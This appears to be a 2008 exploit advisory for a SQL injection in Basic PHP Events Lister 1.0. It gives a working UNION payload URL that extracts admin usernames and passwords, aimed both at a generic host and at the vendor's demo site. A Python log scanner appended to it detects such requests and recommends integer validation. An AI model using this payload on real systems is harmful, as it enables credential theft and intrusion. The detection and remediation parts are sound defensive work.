
# Title : Basic PHP Events Lister 1.0 Remote SQL Injection Vulnerability
# Published : 2008-09-21
# Author : 0x90



[~] Basic PHP Events Lister Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: Basic PHP Events Lister

[~] Site: http://www.mevin.com

[~] Download: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip

[~] Vulnerability Class: SQL Injection

[~] Online Demonstration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--



[~] Exploit:

http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
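
[~] Detection (added example, not part of the original advisory or the script's own code): a log check that flags requests to event.php whose id parameter is not a plain integer. It assumes Common Log Format access logs and that legitimate ids are short unsigned integers; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2008:10:00:01 +0000] "GET /events/event.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [21/Sep/2008:10:00:09 +0000] "GET /events/event.php?id=-0x90+union+select+0x90,concat(uname,0x3a,pword)+from+admin-- HTTP/1.1" 200 6031',
    '192.0.2.10 - - [21/Sep/2008:10:00:15 +0000] "GET /events/event.php?id=7%20UNION%20SELECT%201 HTTP/1.1" 200 4100',
    '192.0.2.12 - - [21/Sep/2008:10:00:20 +0000] "GET /events/list.php?page=2 HTTP/1.1" 200 900',
    '192.0.2.13 - - [21/Sep/2008:10:00:30 +0000] "GET /events/event.php HTTP/1.1" 200 900',
]

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate event id is a short unsigned integer.
INT_RE = re.compile(r"\d{1,10}")
# Tokens that have no place in a numeric id.
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b|--|/\*|'", re.I)


def scan(lines):
    """Return (client, decoded_id, verdict) for each non-integer id sent to event.php."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/event.php"):
            continue
        # parse_qs URL-decodes the value ('+' and %20 both become spaces) and
        # returns every occurrence of id, so repeated parameters are checked too.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if INT_RE.fullmatch(value):
                continue
            verdict = "sql-tokens" if SQL_HINT.search(value) else "non-integer"
            findings.append((client, value, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in event.php before the value reaches the query (together with a parameterized statement), closes the injection point that this check only observes.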

# www.Syue.com [2008-09-21]